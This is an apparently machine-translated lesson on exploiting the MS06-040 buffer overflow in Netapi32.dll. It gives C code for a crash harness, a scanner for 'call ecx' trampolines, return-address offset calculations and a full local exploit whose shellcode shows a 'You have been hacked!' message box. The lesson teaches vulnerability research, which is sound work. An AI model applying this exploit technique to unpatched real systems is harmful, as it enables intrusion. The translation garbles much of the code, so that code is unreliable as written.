Buffer Overflow Analysis Lesson No. 08: ms06-040 Vulnerability Research--Dynamic debugging

Preface

After the last analysis, we already know the nature of the ms06-040 vulnerability, and this time we will be programming to achieve the use of loopholes.

framework for writing exploit programs

Here I am using vc++6.0 to write and need to place the Netapi32.dll file containing the vulnerability in the same directory as the project file. The procedure is as follows:

 #include <windows.h>typedef void (*myproc) (LPTSTR, ...); int main () {char Str[0x320];char lpwidecharstr[0x440];int arg_8 = 0x440;char Source[0x100];long arg_10 = 44; HINSTANCE Libhandle;    MYPROC Func;char dllname[] = "./netapi32.dll"; Libhandle = LoadLibrary (DllName), if (Libhandle = = NULL) {MessageBox (0, "Can ' t Load dll!", "Warning", 0); FreeLibrary (Libhandle);} Func = (MYPROC) GetProcAddress (Libhandle, "netpwpathcanonicalize"), if (Func = = NULL) {MessageBox (0, "Can ' t" Load functi On address! "," Warning ", 0);        FreeLibrary (Libhandle);} memset (str, 0, sizeof (str)), memset (str, ' a ', sizeof (str)-2), memset (source, 0, sizeof (source)), memset (source, ' B ',        sizeof (Source)-2);(Func) (Str, Lpwidecharstr, Arg_8, Source, &arg_10, 0); FreeLibrary (libhandle); return 0;} 

The program is mainly through the LoadLibrary () function to obtain the base address of the Netapi32.dll loaded in the pre-engineering directory, and then obtain the address of the netpwpathcanonicalize () function in the DLL, and use the memset () The function populates the contents of the STR and the source arguments that contain the vulnerable function, and then invokes them. When the program is compiled and executed, the system prompts an error:

Figure 1

The error code shows that the program has a buffer overflow error, the return address is overwritten with 0x61616161, that is, four "a".

Dynamic Debugging VulnerabilityWe use OD to load the above program and use Ida to load the Netapi32.dll dynamic link library. Then execute the LoadLibrary () function in OD:

Figure 2

It can be seen that the Netapi32.dll has been successfully loaded, and that the load address of the dynamic link library is stored in EAX. The address of the function netpwpathcanonicalize () function is found in Ida below:

Figure 3

It can be seen that the address of the function is 0x7517f2e2, then we jump directly to this position in OD, the next breakpoint and execute it:

Figure 4

In conjunction with the last analysis, we know that the problematic function is the function called Call sub_7517fc68 at the 0x7517f856 location:

Figure 5

Then the next step is to use OD to enter this call for analysis. First look at the situation in the current stack:

Figure 6

From the known, the return address is the location of the 0x0012f670, but also needs to be covered by the "Springboard" location. This lets the program execute the first string copy function:

Figure 7

As you can see, the program starts at the 0x0012f258 location and copies a total of 254, or 0xFE letters, "B", which is consistent with the program we wrote. The program then adds "\" to the string followed by the location of the second copy of the string:

Figure 8

Here the long string character "a" is connected to the "\" after the beginning address of "a" is 0x0012f358, a total copy of 798 is 0x31e. This is consistent with the procedures we have written. It then executes to the returned location, because the return address is an unrecognized space, so an error is prompted:

Figure 9

At this point, it can be found that the ECX is the address of the beginning of the buffer, then we can take advantage of this feature, the Shellcode is implanted in the source string, and the return address is overwritten as call ecx, so when the program returns, Will come directly to 0x0012f258 's location for execution.

Get call ECX addressWe also need to look up the call ECX directive. It's opcode for FFD1, we're looking directly at Netapi32.dll in this program, just make a few changes to the program we talked about to find call ESP:

#include <windows.h> #include <stdio.h> #include <stdlib.h> #define DLL_NAME "./netapi32.dll" int main        () {BYTE *ptr;        int position,address;        HINSTANCE handle;        BOOL Done_flag = FALSE;        Handle = LoadLibrary (Dll_name);                if (!handle) {printf ("Load DLL error!");        Exit (0);        } ptr = (byte*) handle; for (position = 0;!done_flag; position++) {try {if (ptr[posit Ion]==0xff && ptr[position+1]==0xd1) {int address = (int) pt                                R + position;                        printf ("OPCODE found at 0x%x\n", address);                }} catch (...)                        {int address = (int) ptr + position;                        printf ("END of 0x%x\n", address);                Done_flag = true;  }        }      GetChar (); return 0;}

The results are as follows:

Figure Ten

According to, here I choose is the first result, namely 0X751852F9 as our shellcode springboard. It is necessary to note that the return address here is 0x0012f670, the beginning of the buffer is 0x0012f258, the offset between them is 0x418, the parameter source is removed and the "\" occupies the 0x100, to get 0x418-0x100=0x318, that is, Starting at the offset 0x318 position of the STR string is where we need to overwrite the return address.

completing the exploit programThe previous framework program can then be modified to:

#include <windows.h>typedef void (*myproc) (LPTSTR, ...); Char shellcode[] = "\x33\xdb"//XOR Ebx,ebx "\xb7\x06"//mov bh,6 "\x2b\xe3"//Sub ES P,EBX "\x33\xdb"//XOR Ebx,ebx "\x53"//push EBX "\x68\x69\x6e\ x67\x20 "\x68\x57\x61\x72\x6e"//Push "Warning" "\x8b\xc4"//mov Eax,esp "\x53 "//Push EBX" \x68\x2e\x29\x20\x20 "" \x68\x20\x4a\x2e\x59 "" \x68\x21\x28\x62\x79 "" \x68\  X63\x6b\x65\x64 "" \x68\x6e\x20\x68\x61 "" \x68\x20\x62\x65\x65 "" \x68\x68\x61\x76\x65 "" \x68\x59\x6F\x75\x20 "//push "You have been hacked! (by J.Y.) ""                               \X8B\XCC "//mov Ecx,esp" \x53 "//Push ebx" \x50 " push eax "\x51"//push ECX "\x53"//PU SH ebx "\xb8\xea\x07\xd5\x77" "\xff\xd0 "//Call MessageBox" \x53 "" \xb8\xfa\                          xca\x81\x7c "" \xff\xd0 "; Call ExitProcess int main () {char Str[0x320];char lpwidecharstr[0x440];int arg_8 = 0x440;char Source[0x100];lo ng arg_10 = 44; HINSTANCE Libhandle; MYPROC Func;char dllname[] = "./netapi32.dll";    LoadLibrary ("user32.dll"); Libhandle = LoadLibrary (DllName), if (Libhandle = = NULL) {MessageBox (0, "Can ' t Load dll!", "Warning", 0); FreeLibrary (Libhandle);} Func = (MYPROC) GetProcAddress (Libhandle, "netpwpathcanonicalize"), if (Func = = NULL) {MessageBox (0, "Can ' t" Load functi On address! "," Warning ", 0);        FreeLibrary (Libhandle);} memset (str, 0, sizeof (str)), memset (str, ' a ', sizeof (str)-2), memset (source, 0, sizeof (source)), memset (source, ' B ', sizeof (source)-2); memcpy (source, ShellCode, sizeof (ShellCode)); STR[0X318] = 0xf9; str[0x319] = 0x52; STR[0X31A] = 0x18; STR[0X31B] = 0x75; (Func) (STR, Lpwidecharstr, Arg_8, Source, &arg_10, 0); FreeLibrary (libhandle); return 0;}

The results of the operation are as follows:

Figure One

It can be seen that we have successfully exploited this vulnerability.

SummaryThis shows that for system-level vulnerabilities, it is very important to update patches in a timely manner. And as a vulnerability analysis personnel, but also have perseverance and perseverance, and constantly accumulate experience, the courage to accept the challenge, a lot of trying to have a harvest.

Buffer Overflow Analysis Lesson No. 08: ms06-040 Vulnerability Research--Dynamic debugging